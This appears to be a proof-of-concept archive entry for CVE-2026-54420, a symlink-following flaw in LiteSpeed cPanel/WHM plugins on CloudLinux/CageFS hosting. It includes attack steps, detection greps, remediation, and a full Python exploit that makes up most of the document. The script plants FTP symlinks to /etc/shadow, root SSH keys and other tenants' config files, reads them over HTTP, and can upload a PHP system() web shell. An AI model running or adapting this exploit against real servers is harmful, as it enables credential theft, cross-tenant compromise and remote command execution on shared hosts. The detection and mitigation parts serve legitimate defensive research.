PoC Archive PoC Archive
High CVE-2026-54420 unpatched

LiteSpeed cPanel/WHM Plugin Symlink Privilege Escalation — CVE-2026-54420

by fevar54 (GitHub); script self-identifies author as "Security Research" · 2026-07-05

CVSS 8.5/10
Severity
High
CVE
CVE-2026-54420
Category
network
Affected product
LiteSpeed cPanel Plugin / WHM Plugin
Affected versions
LiteSpeed cPanel Plugin < 2.4.8; LiteSpeed WHM Plugin < 5.3.2.0
Disclosed
2026-07-05
Patch status
unpatched

Metadata

FieldValue
Date Added2026-07-05
Last Updated2026-06
Author / Researcherfevar54 (GitHub); script self-identifies author as “Security Research”
CVE / AdvisoryCVE-2026-54420
Categorynetwork
SeverityHigh
CVSS Score8.5 (AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H)
StatusPoC
Tagslitespeed, cpanel, whm, symlink, cwe-61, cloudlinux, cagefs, shared-hosting, ftp, privilege-escalation
RelatedN/A

Affected Target

FieldValue
Software / SystemLiteSpeed cPanel Plugin / WHM Plugin
Versions AffectedLiteSpeed cPanel Plugin < 2.4.8; LiteSpeed WHM Plugin < 5.3.2.0
Language / PlatformPython 3 (requests, ftplib) targeting FTP + HTTP on shared hosting running CloudLinux/CageFS
Authentication RequiredYes — valid FTP credentials (or existing web shell access) on the target account
Network Access RequiredYes (FTP + HTTP)

Summary

LiteSpeed’s cPanel and WHM plugins mishandle user-supplied symbolic links on shared hosting servers isolated with CloudLinux/CageFS. A tenant with FTP or web shell access to their own account can create a symlink (via SITE SYMLINK, rename-based tricks, or SITE CP over FTP) that points outside their assigned CageFS jail, then request that symlink over HTTP to have LiteSpeed follow it and serve the target file’s contents — reading files such as /etc/passwd, /etc/shadow, other tenants’ configuration/credential files, and LiteSpeed’s own configuration. The PoC also demonstrates uploading a PHP web shell over FTP for persistent access once file-read access has yielded further credentials.


Vulnerability Details

Root Cause

CWE-61 (UNIX Symbolic Link Following): the LiteSpeed cPanel/WHM plugin follows symlinks created by low-privileged FTP/web users without enforcing the CageFS/CloudLinux jail boundary or symlink-ownership restrictions, allowing reads of arbitrary files outside the tenant’s assigned directory.

Attack Vector

  1. Connect over FTP to the target hosting account using valid (or anonymous, where permitted) credentials and detect the account’s web root.
  2. Issue a symlink-creation command (SITE SYMLINK, plain SYMLINK, or a RNFR/RNTO rename-based fallback) inside the web root, pointing to a sensitive file outside the CageFS jail (e.g. /etc/passwd, /etc/shadow, another user’s wp-config.php).
  3. Request the resulting symlink over HTTP(S) — LiteSpeed follows the link and returns the target file’s contents to the attacker.
  4. Optionally, upload a PHP web shell over FTP into the web root for command execution and persistence, leveraging credentials/secrets recovered from step 3.
  5. Repeat against a list of common sensitive-file paths to enumerate what is readable.

Impact

Local information disclosure and CageFS/CloudLinux isolation escape on shared hosting: an attacker with only their own tenant’s FTP access can read system files, other tenants’ secrets, and server configuration, and can escalate to remote code execution via a planted web shell — potentially enabling full host or cross-tenant compromise. CISA KEV lists exploitation confirmed in the wild (per the repository).


Environment / Lab Setup

Target:   Shared cPanel/WHM host running LiteSpeed cPanel Plugin < 2.4.8 or WHM Plugin < 5.3.2.0, with CloudLinux/CageFS, FTP enabled
Attacker: Python 3, `pip install -r requirements.txt` (requests), ftplib (stdlib)

Proof of Concept

PoC Script

See litespeed_symlink_exploit.py in this folder (mirrored from the upstream repo’s extensionless “PoC Funcional” file). Supporting upstream notes are preserved as upstream-notas.txt, upstream-mitigacion.txt, upstream-iocs.txt, and upstream-output-esperado.txt.

1
python3 litespeed_symlink_exploit.py -t example.com -u ftpuser -p ftppass --enum

The script logs into the target via FTP, detects the account’s web root, creates symlinks pointing at a list of sensitive system/config files (or a single file via --file), reads their contents back over HTTP, can optionally drop a PHP web shell (--webshell) for persistent command execution, and supports --cleanup to remove created symlinks/artifacts afterward.


Detection & IOCs

grep -E "SITE SYMLINK|RNFR|RNTO" /var/log/messages
grep -E "SYMLINK" /var/log/ftp.log
grep -E "symlink" /var/log/lsws/error.log

Signs of compromise:

  • .txt/other files under public_html that are actually symlinks pointing to /etc/* or /home/*
  • Unusual PHP files in web directories (e.g. shell_<timestamp>.php, read_*.txt)
  • FTP logs showing SITE SYMLINK, SYMLINK, or suspicious RNFR/RNTO rename pairs used to fabricate symlinks

Remediation

ActionDetail
Primary fixUpdate the LiteSpeed cPanel Plugin (/usr/local/lsws/admin/misc/lsup.sh -f) and WHM Plugin to versions >= 2.4.8 / >= 5.3.2.0
Interim mitigationDisable SITE SYMLINK in the FTP daemon (e.g. <Limit SITE_SYMLINK> DenyAll </Limit> in ProFTPD), enforce CageFS symlink blocking (cagefsctl --block-symlinks), and enable SymLinksIfOwnerMatch in the LiteSpeed httpd config

References


Notes

Mirrored from https://github.com/fevar54/CVE-2026-54420-LiteSpeed-Symlink-Exploit on 2026-07-05. The upstream repository stores its supporting documentation and the main exploit script as extensionless, Spanish-named files (e.g. PoC Funcional, NOTAS, Mitigación); these were renamed to descriptive .py/.txt filenames for this archive entry while preserving their original content verbatim. Categorized as network given the FTP-based attack vector, though the target application (LiteSpeed web server) is web-facing.

litespeed_symlink_exploit.py
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
#!/usr/bin/env python3
"""
CVE-2026-54420 - LiteSpeed cPanel Plugin Symlink Privilege Escalation
=======================================================================
A vulnerability in LiteSpeed cPanel Plugin before 2.4.8 and WHM Plugin before
5.3.2.0 mishandles symlinks provided by a user with FTP or web shell access
on a shared hosting server running CloudLinux/CageFS.

CWE-61: UNIX Symbolic Link (Symlink) Following
CVSS: 8.5 (HIGH) | Exploitation confirmed in wild (May 2026)
CISA KEV: Added 2026-06-15 | Due 2026-06-18

Author: Security Research
Disclaimer: For authorized security testing and educational purposes only.
"""

import argparse
import requests
import sys
import os
import time
import base64
from urllib.parse import urlparse
from ftplib import FTP
from ftplib import error_perm
import socket
import hashlib
import json
from datetime import datetime

# ANSI Colors
R = "\033[91m"
G = "\033[92m"
Y = "\033[93m"
B = "\033[94m"
BOLD = "\033[1m"
RESET = "\033[0m"


class LiteSpeedSymlinkExploit:
    """Exploit for CVE-2026-54420 - Symlink following in LiteSpeed cPanel Plugin"""
    
    def __init__(self, target, username=None, password=None, ftp_port=21):
        self.target = target
        self.username = username
        self.password = password
        self.ftp_port = ftp_port
        self.ftp = None
        self.webshell_url = None
        self.web_root = "/home/username/public_html"
        self.symlinks_created = []
        self.vulnerable = False
        
    def connect_ftp(self):
        """Establish FTP connection to target server"""
        try:
            print(f"{B}[*] Connecting to FTP: {self.target}:{self.ftp_port}{RESET}")
            
            if self.ftp_port == 21:
                self.ftp = FTP(self.target)
            else:
                self.ftp = FTP()
                self.ftp.connect(self.target, self.ftp_port)
            
            if self.username and self.password:
                self.ftp.login(self.username, self.password)
            else:
                # Try anonymous login
                self.ftp.login()
            
            print(f"{G}[+] FTP login successful as {self.username or 'anonymous'}{RESET}")
            
            # Get current working directory
            cwd = self.ftp.pwd()
            print(f"{B}[*] FTP CWD: {cwd}{RESET}")
            
            # Determine web root (common patterns)
            self._detect_web_root()
            
            return True
            
        except Exception as e:
            print(f"{R}[-] FTP connection failed: {e}{RESET}")
            return False
    
    def _detect_web_root(self):
        """Detect web root directory based on FTP path"""
        try:
            cwd = self.ftp.pwd()
            
            # Common patterns
            patterns = [
                ("/home/", "/public_html"),
                ("/home/", "/www"),
                ("/home/", "/web"),
                ("/var/www/", "/html"),
                ("/srv/www/", "/htdocs"),
                ("/home/", "/public_ftp")
            ]
            
            for prefix, suffix in patterns:
                if prefix in cwd:
                    self.web_root = cwd
                    break
            
            # If username is known, try to build path
            if self.username:
                home_path = f"/home/{self.username}"
                try:
                    self.ftp.cwd(home_path)
                    self.web_root = home_path
                    print(f"{B}[*] Web root detected: {self.web_root}{RESET}")
                except:
                    pass
                
        except Exception:
            pass
    
    def create_symlink(self, target_path, link_name):
        """
        Create symlink via FTP
        Supports multiple FTP server types (ProFTPD, vsftpd, Pure-FTPd)
        """
        try:
            # Try different symlink commands
            commands = [
                f'SITE SYMLINK "{target_path}" "{link_name}"',
                f'SITE SYMLINK {target_path} {link_name}',
                f'SYMLINK {target_path} {link_name}',
                f'RNFR {target_path}\r\nRNTO {link_name}',
                f'SITE CP {target_path} {link_name}',
            ]
            
            for cmd in commands:
                try:
                    response = self.ftp.sendcmd(cmd)
                    if '2' in response[:1]:
                        self.symlinks_created.append(link_name)
                        print(f"{G}[+] Symlink created: {link_name} -> {target_path}{RESET}")
                        return True
                except error_perm:
                    continue
            
            # Alternative: Try using NLST to check if target exists
            try:
                self.ftp.voidcmd(f'RNFR {target_path}')
                self.ftp.voidcmd(f'RNTO {link_name}')
                self.symlinks_created.append(link_name)
                print(f"{G}[+] Rename-based symlink created: {link_name} -> {target_path}{RESET}")
                return True
            except:
                pass
            
            return False
            
        except Exception as e:
            print(f"{Y}[-] Symlink creation failed: {e}{RESET}")
            return False
    
    def read_symlink_via_http(self, link_name):
        """Attempt to read symlink content via HTTP"""
        try:
            # Try common web paths
            base_urls = [
                f"http://{self.target}/{link_name}",
                f"http://{self.target}/{os.path.basename(link_name)}",
                f"https://{self.target}/{link_name}",
                f"http://www.{self.target}/{link_name}",
                f"http://{self.target}/~user/{link_name}"
            ]
            
            for url in base_urls:
                try:
                    r = requests.get(url, timeout=10, verify=False)
                    if r.status_code == 200:
                        print(f"{G}[+] Read symlink via HTTP: {url}{RESET}")
                        print(f"{G}[+] Content length: {len(r.text)} bytes{RESET}")
                        return r.text
                except:
                    continue
            
            return None
            
        except Exception as e:
            print(f"{Y}[-] HTTP read failed: {e}{RESET}")
            return None
    
    def webshell_upload(self, shell_content=None):
        """Upload a web shell via FTP for persistent access"""
        if not shell_content:
            shell_content = """<?php
// CVE-2026-54420 Web Shell
// USE ONLY WITH PROPER AUTHORIZATION
if(isset($_GET['cmd'])) {
    echo '<pre>';
    system($_GET['cmd']);
    echo '</pre>';
}
if(isset($_POST['cmd'])) {
    echo '<pre>';
    system($_POST['cmd']);
    echo '</pre>';
}
?>"""
        
        try:
            # Create a file in the web root
            shell_name = f"shell_{int(time.time())}.php"
            temp_file = f"/tmp/{shell_name}"
            
            # Write shell content to temp file
            with open(temp_file, 'w') as f:
                f.write(shell_content)
            
            # Upload via FTP
            with open(temp_file, 'rb') as f:
                self.ftp.storbinary(f'STOR {shell_name}', f)
            
            os.remove(temp_file)
            
            self.webshell_url = f"http://{self.target}/{shell_name}"
            print(f"{G}[+] Web shell uploaded: {self.webshell_url}{RESET}")
            print(f"{G}[+] Use: {self.webshell_url}?cmd=id{RESET}")
            return True
            
        except Exception as e:
            print(f"{R}[-] Web shell upload failed: {e}{RESET}")
            return False
    
    def enumerate_vulnerable_files(self):
        """Enumerate common sensitive files to read via symlink"""
        
        sensitive_files = [
            # System files
            "/etc/passwd",
            "/etc/shadow",
            "/etc/hosts",
            "/etc/group",
            "/etc/hostname",
            "/etc/issue",
            "/proc/self/environ",
            "/proc/cpuinfo",
            "/proc/meminfo",
            
            # Web server configs
            "/etc/lsws/conf/httpd_config.conf",
            "/etc/lsws/sites/",
            "/usr/local/lsws/conf/",
            "/etc/apache2/sites-available/",
            "/etc/nginx/sites-available/",
            
            # Database configs
            "/var/lib/mysql/mysql/user.MYD",
            "/home/otheruser/config.php",
            "/home/otheruser/wp-config.php",
            "/home/otheruser/configuration.php",
            
            # LiteSpeed specific
            "/usr/local/lsws/conf/htpasswd",
            "/usr/local/lsws/conf/htaccess",
            "/usr/local/lsws/admin/",
            
            # CloudLinux/CageFS
            "/etc/cagefs/cagefs.users",
            "/etc/cagefs/cagefs.mp",
            "/var/cagefs/",
            
            # SSH keys
            "/root/.ssh/id_rsa",
            "/root/.ssh/authorized_keys",
            "/home/*/.ssh/id_rsa",
            "/home/*/.ssh/authorized_keys",
        ]
        
        readable_files = []
        
        print(f"{B}[*] Attempting to read sensitive files via symlink{RESET}")
        
        for target_file in sensitive_files:
            link_name = f"read_{os.path.basename(target_file)}_{int(time.time()) % 10000}.txt"
            link_name = link_name.replace('*', 'star')
            
            if self.create_symlink(target_file, link_name):
                content = self.read_symlink_via_http(link_name)
                if content and len(content) > 10:
                    readable_files.append({
                        "file": target_file,
                        "content": content[:500],
                        "length": len(content)
                    })
                    print(f"{G}[+] SUCCESS: Read {target_file} ({len(content)} bytes){RESET}")
                    
                    # Show preview
                    lines = content.split('\n')[:10]
                    for line in lines:
                        if line.strip():
                            print(f"    {line[:100]}")
                    
                    self.vulnerable = True
                else:
                    print(f"{Y}[-] Could not read {target_file}{RESET}")
        
        return readable_files
    
    def check_existing_symlinks(self):
        """Check if there are already symlinks in the web directory"""
        try:
            files = self.ftp.nlst()
            symlinks = []
            
            for f in files:
                try:
                    # Try to get file info
                    response = self.ftp.sendcmd(f'STAT {f}')
                    if '->' in response:
                        symlinks.append(f)
                        print(f"{Y}[*] Existing symlink found: {f}{RESET}")
                except:
                    continue
            
            return symlinks
        except:
            return []
    
    def cleanup(self):
        """Remove created symlinks and uploaded shells"""
        print(f"{B}[*] Cleaning up...{RESET}")
        
        for link in self.symlinks_created:
            try:
                self.ftp.delete(link)
                print(f"{G}[+] Removed: {link}{RESET}")
            except:
                pass
        
        # Also try to remove web shell
        if self.webshell_url:
            shell_name = self.webshell_url.split('/')[-1]
            try:
                self.ftp.delete(shell_name)
                print(f"{G}[+] Removed web shell: {shell_name}{RESET}")
            except:
                pass
        
        if self.ftp:
            self.ftp.quit()
    
    def exploit_full(self, target_file=None):
        """Full exploit chain"""
        print(f"\n{B}{BOLD}╔═══════════════════════════════════════════════════════════════╗{RESET}")
        print(f"{B}{BOLD}║  CVE-2026-54420 - LiteSpeed Symlink Privilege Escalation   ║{RESET}")
        print(f"{B}{BOLD}║  CVSS: 8.5 (HIGH) | CISA KEV: 2026-06-15                   ║{RESET}")
        print(f"{B}{BOLD}╚═══════════════════════════════════════════════════════════════╝{RESET}")
        print()
        
        # Step 1: Connect via FTP
        if not self.connect_ftp():
            print(f"{R}[!] FTP connection required for this exploit{RESET}")
            return False
        
        # Step 2: Check existing symlinks
        existing = self.check_existing_symlinks()
        if existing:
            print(f"{Y}[*] Found {len(existing)} existing symlinks{RESET}")
        
        # Step 3: Enumerate vulnerable files
        if target_file:
            link_name = f"read_{os.path.basename(target_file)}_{int(time.time()) % 10000}.txt"
            if self.create_symlink(target_file, link_name):
                content = self.read_symlink_via_http(link_name)
                if content:
                    print(f"{G}[+] Read target file: {target_file}{RESET}")
                    print(content)
                    self.vulnerable = True
        else:
            # Auto-enumerate common targets
            readable = self.enumerate_vulnerable_files()
        
        # Step 4: Determine vulnerability
        if self.vulnerable:
            print(f"\n{R}{BOLD}╔═══════════════════════════════════════════════════════════════╗{RESET}")
            print(f"{R}{BOLD}║  [!!!!!] SERVER IS VULNERABLE TO CVE-2026-54420            ║{RESET}")
            print(f"{R}{BOLD}║  Symlink following allows file read outside designated dir  ║{RESET}")
            print(f"{R}{BOLD}╚═══════════════════════════════════════════════════════════════╝{RESET}")
            
            # Offer to upload web shell
            print(f"{Y}[?] Do you want to upload a web shell for persistent access?{RESET}")
            # Auto-upload if running in batch mode
            if os.environ.get('AUTO_SHELL', 'false').lower() == 'true':
                self.webshell_upload()
        else:
            print(f"\n{G}{BOLD}[✓] Server does not appear vulnerable to CVE-2026-54420{RESET}")
            print(f"{Y}[*] Note: This could be because:{RESET}")
            print(f"{Y}    1. The server is patched (>= 2.4.8 / 5.3.2.0){RESET}")
            print(f"{Y}    2. Symlink creation is disabled in FTP{RESET}")
            print(f"{Y}    3. HTTP access to symlinks is restricted{RESET}")
            print(f"{Y}    4. CloudLinux/CageFS is properly configured{RESET}")
        
        return self.vulnerable


def main():
    parser = argparse.ArgumentParser(
        description="CVE-2026-54420 - LiteSpeed cPanel Plugin Symlink Exploit",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  # Basic exploit with FTP credentials
  %(prog)s -t example.com -u ftpuser -p ftppass
  
  # Read specific file
  %(prog)s -t example.com -u ftpuser -p ftppass --file /etc/passwd
  
  # Upload web shell
  %(prog)s -t example.com -u ftpuser -p ftppass --webshell
  
  # Full enumeration
  %(prog)s -t example.com -u ftpuser -p ftppass --enum --verbose
        """
    )
    
    parser.add_argument("-t", "--target", required=True, help="Target domain or IP")
    parser.add_argument("-u", "--username", help="FTP username")
    parser.add_argument("-p", "--password", help="FTP password")
    parser.add_argument("--ftp-port", type=int, default=21, help="FTP port (default: 21)")
    parser.add_argument("--file", help="Specific file to read via symlink")
    parser.add_argument("--enum", action="store_true", help="Enumerate common sensitive files")
    parser.add_argument("--webshell", action="store_true", help="Upload web shell after exploitation")
    parser.add_argument("-v", "--verbose", action="store_true", help="Verbose output")
    parser.add_argument("--cleanup", action="store_true", help="Remove created symlinks after exploit")
    
    args = parser.parse_args()
    
    exploit = LiteSpeedSymlinkExploit(
        target=args.target,
        username=args.username,
        password=args.password,
        ftp_port=args.ftp_port
    )
    
    try:
        # Run exploit
        success = exploit.exploit_full(target_file=args.file)
        
        # Auto-enumerate if requested
        if args.enum and success:
            print(f"\n{Y}[*] Running additional enumeration...{RESET}")
            exploit.enumerate_vulnerable_files()
        
        # Upload web shell if requested
        if args.webshell and success:
            exploit.webshell_upload()
        
        # Clean up
        if args.cleanup or not success:
            exploit.cleanup()
        
        # Print summary
        print(f"\n{B}╔═══════════════════════════════════════════════════════════════╗{RESET}")
        print(f"{B}║  SCAN COMPLETE                                                ║{RESET}")
        print(f"{B}╠═══════════════════════════════════════════════════════════════╣{RESET}")
        
        if success:
            print(f"{R}║  VULNERABLE: CVE-2026-54420 confirmed                        ║{RESET}")
            print(f"{R}║  Apply mitigation: Update to LiteSpeed cPanel Plugin 2.4.8+   ║{RESET}")
        else:
            print(f"{G}║  NOT VULNERABLE (or exploitation conditions not met)          ║{RESET}")
        
        print(f"{B}╚═══════════════════════════════════════════════════════════════╝{RESET}")
        print(f"\n{B}[*] Reference: https://www.cisa.gov/known-exploited-vulnerabilities-catalog{RESET}")
        print(f"{B}[*] Due Date: 2026-06-18{RESET}")
        
    except KeyboardInterrupt:
        print(f"\n{Y}[!] Interrupted by user{RESET}")
        exploit.cleanup()
    except Exception as e:
        print(f"{R}[!] Error: {e}{RESET}")
        exploit.cleanup()
        sys.exit(1)


if __name__ == "__main__":
    main()